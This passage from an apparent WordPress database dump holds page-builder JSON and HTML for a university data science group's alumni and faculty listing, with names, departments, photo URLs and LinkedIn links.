Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c166\",\"index\":2,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c166\",\"index\":1,\"id\":\"182-c170\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c171\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Anvith-e1697208489419.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1780,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c171\",\"index\":2,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c171\",\"index\":1,\"id\":\"182-c175\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c176\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Alex-e1697208598736.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1782,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c176\",\"index\":2,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c176\",\"index\":1,\"id\":\"182-c180\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c181\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1784,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c181\",\"index\":2,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c181\",\"index\":1,\"id\":\"182-c185\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c186\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1786,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c186\",\"index\":2,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c186\",\"index\":1,\"id\":\"182-c190\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c191\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1788,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c191\",\"index\":2,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c191\",\"index\":1,\"id\":\"182-c195\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c196\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1790,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c196\",\"index\":2,\"id\":\"182-c199\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c196\",\"index\":1,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c201\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c201\",\"index\":0,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1792,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c201\",\"index\":0,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c201\",\"index\":2,\"id\":\"182-c204\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c205\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1794,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c205\",\"index\":2,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c205\",\"index\":1,\"id\":\"182-c209\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c210\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c211\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1795,\"size\":\"\"},\"domuuid\":\"182-c161\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c212\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Eliza Schuh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c210\",\"index\":2,\"id\":\"182-c213\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/search\\/results\\/all\\/?fetchDeterministicClustersOnly=true&heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&keywords=eliza%20schuh&origin=RICH_QUERY_TYPEAHEAD_HISTORY&position=0&searchId=e7657352-5ea3-4501-b984-d21542771bc4&sid=WW)&spellCorrectionEnabled=true\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c210\",\"index\":1,\"id\":\"182-c214\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c215\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c216\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bronson-e1697209357897.png\",\"caption\":{\"text\":\"\"},\"imageId\":1797,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c217\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c215\",\"index\":2,\"id\":\"182-c218\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c215\",\"index\":1,\"id\":\"182-c219\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c165\",\"parentId\":\"182-c164\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c164\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c222\",\"parentId\":\"182-c221\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c221\",\"parentId\":\"182-c220\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c220\",\"parentId\":\"182-c164\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2024-02-23 10:11:20','2024-02-23 15:11:20','',562,'https://gsudice.dataconn.net/?p=1825',0,'revision','',0),(1826,1,'2024-02-23 10:11:21','2024-02-23 15:11:21','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c70\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c70 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c71-outer\">\n            <div data-colibri-id=\"182-c71\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c71 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c72\" class=\"h-global-transition-all h-heading style-986 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c72\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 